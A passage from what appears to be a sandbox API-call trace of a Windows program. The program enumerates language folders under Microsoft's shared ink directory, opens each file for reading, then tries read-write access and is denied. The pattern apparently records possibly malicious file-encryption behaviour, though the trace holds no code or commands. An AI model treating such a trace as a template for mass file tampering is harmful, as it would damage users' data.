ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.639] AreFileApisANSI () returned 1 [0085.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK", lpUsedDefaultChar=0x0) returned 57 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.640] AreFileApisANSI () returned 1 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 57 [0085.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.640] GetLastError () returned 0x5 [0085.640] GetLastError () returned 0x5 [0085.640] SetLastError (dwErrCode=0x5) [0085.640] GetLastError () returned 0x5 [0085.640] SetLastError (dwErrCode=0x5) [0085.640] GetLastError () returned 0x5 [0085.640] SetLastError (dwErrCode=0x5) [0085.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.640] AreFileApisANSI () returned 1 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0085.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 57 [0085.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.641] GetLastError () returned 0x5 [0085.641] GetLastError () returned 0x5 [0085.641] SetLastError (dwErrCode=0x5) [0085.641] GetLastError () returned 0x5 [0085.641] SetLastError (dwErrCode=0x5) [0085.641] GetLastError () returned 0x5 [0085.641] SetLastError (dwErrCode=0x5) [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0085.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.641] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.641] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78910 [0085.641] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.641] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.642] AreFileApisANSI () returned 1 [0085.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0085.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.643] AreFileApisANSI () returned 1 [0085.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0085.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 73 [0085.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.644] GetFileType (hFile=0x360) returned 0x1 [0085.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0085.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.644] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.644] CloseHandle (hObject=0x360) returned 1 [0085.645] AreFileApisANSI () returned 1 [0085.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0085.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 73 [0085.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.645] GetLastError () returned 0x5 [0085.645] GetLastError () returned 0x5 [0085.645] SetLastError (dwErrCode=0x5) [0085.645] GetLastError () returned 0x5 [0085.645] SetLastError (dwErrCode=0x5) [0085.645] GetLastError () returned 0x5 [0085.645] SetLastError (dwErrCode=0x5) [0085.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0085.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0085.645] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.645] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.645] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0085.645] FindClose (in: hFindFile=0x78910 | out: hFindFile=0x78910) returned 1 [0085.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.646] AreFileApisANSI () returned 1 [0085.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI", lpUsedDefaultChar=0x0) returned 57 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.647] AreFileApisANSI () returned 1 [0085.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 57 [0085.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.647] GetLastError () returned 0x5 [0085.647] GetLastError () returned 0x5 [0085.647] SetLastError (dwErrCode=0x5) [0085.647] GetLastError () returned 0x5 [0085.647] SetLastError (dwErrCode=0x5) [0085.647] GetLastError () returned 0x5 [0085.647] SetLastError (dwErrCode=0x5) [0085.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.647] AreFileApisANSI () returned 1 [0085.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0085.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 57 [0085.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.647] GetLastError () returned 0x5 [0085.647] GetLastError () returned 0x5 [0085.647] SetLastError (dwErrCode=0x5) [0085.647] GetLastError () returned 0x5 [0085.647] SetLastError (dwErrCode=0x5) [0085.648] GetLastError () returned 0x5 [0085.648] SetLastError (dwErrCode=0x5) [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 